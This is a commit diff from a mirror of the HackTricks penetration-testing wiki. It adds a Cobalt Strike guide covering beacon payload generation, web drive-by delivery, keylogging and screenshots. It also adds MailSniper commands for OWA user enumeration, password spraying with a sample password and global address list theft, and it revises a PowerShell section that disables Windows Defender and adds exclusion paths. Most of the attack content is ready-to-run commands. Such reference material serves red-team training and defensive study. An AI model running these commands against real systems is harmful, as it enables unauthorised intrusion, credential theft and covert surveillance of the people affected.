mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GitBook: [#3365] No subject
This commit is contained in:
parent
cbff1b34ea
commit
b60731d690
4 changed files with 69 additions and 6 deletions
|
@ -639,6 +639,7 @@
|
|||
* [Empire](backdoors/empire.md)
|
||||
* [Salseo](backdoors/salseo.md)
|
||||
* [ICMPsh](backdoors/icmpsh.md)
|
||||
* [Cobalt Strike](c2/cobalt-strike.md)
|
||||
|
||||
## ✍ TODO
|
||||
|
||||
|
|
42
c2/cobalt-strike.md
Normal file
42
c2/cobalt-strike.md
Normal file
|
@ -0,0 +1,42 @@
|
|||
# Cobalt Strike
|
||||
|
||||
### Listeners
|
||||
|
||||
Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more
|
||||
|
||||
### Generate & Host payloads
|
||||
|
||||
#### Generate payloads in files
|
||||
|
||||
Attacks -> Packages -> 
|
||||
|
||||
* **`HTMLApplication`** for HTA files
|
||||
* **`MS Office Macro`** for an office document with a macro
|
||||
* **`Windows Executable`** for a .exe, .dll orr service .exe
|
||||
* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs)
|
||||
|
||||
#### Generate & Host payloads
|
||||
|
||||
A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
|
||||
|
||||
#### Host Payloads
|
||||
|
||||
If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
|
||||
|
||||
### Beacon Options
|
||||
|
||||
```bash
|
||||
# Execute local .NET binary
|
||||
execute-assembly </path/to/executable.exe>
|
||||
|
||||
|
||||
# Screenshots
|
||||
printscreen # Take a single screenshot via PrintScr method
|
||||
screenshot # Take a single screenshot
|
||||
screenwatch # Take periodic screenshots of desktop
|
||||
## Go to View -> Screenshots to see them
|
||||
|
||||
# keylogger
|
||||
keylogger [pid] [x86|x64]
|
||||
## View > Keystrokes to see the keys pressed
|
||||
```
|
|
@ -91,6 +91,28 @@ msf> use auxiliary/gather/kerberos_enumusers
|
|||
crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
|
||||
```
|
||||
|
||||
{% hint style="warning" %}
|
||||
You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names).
|
||||
|
||||
However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) **** to generate potential valid usernames.
|
||||
{% endhint %}
|
||||
|
||||
#### **OWA (Outlook Web Access) Server**
|
||||
|
||||
If you found one of these servers in the network you can also perform **user enumeration against it**. For example, you could use the tool [**MailSniper**](https://github.com/dafthack/MailSniper):
|
||||
|
||||
```bash
|
||||
ipmo C:\Tools\MailSniper\MailSniper.ps1
|
||||
# Get info about the domain
|
||||
Invoke-DomainHarvestOWA -ExchHostname [ip]
|
||||
# Enumerate valid users from a list of potential usernames
|
||||
Invoke-UsernameHarvestOWA -ExchHostname [ip] -Domain [domain] -UserList .\possible-usernames.txt -OutFile valid.txt
|
||||
# Password spraying
|
||||
Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summer2021
|
||||
# Get addresses list from the compromised mail
|
||||
Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt
|
||||
```
|
||||
|
||||
### Knowing one or several usernames
|
||||
|
||||
Ok, so you know you have already a valid username but no passwords... Then try:
|
||||
|
|
|
@ -176,15 +176,13 @@ Get-NetConnectionProfile |
|
|||
}
|
||||
```
|
||||
|
||||
## Disable Defender
|
||||
## Antivirus
|
||||
|
||||
```bash
|
||||
#Check status
|
||||
Get-MpComputerStatus
|
||||
#Disable
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
#To completely disable Windows Defender on a computer, use the command:
|
||||
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
|
||||
#Set exclusion path
|
||||
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue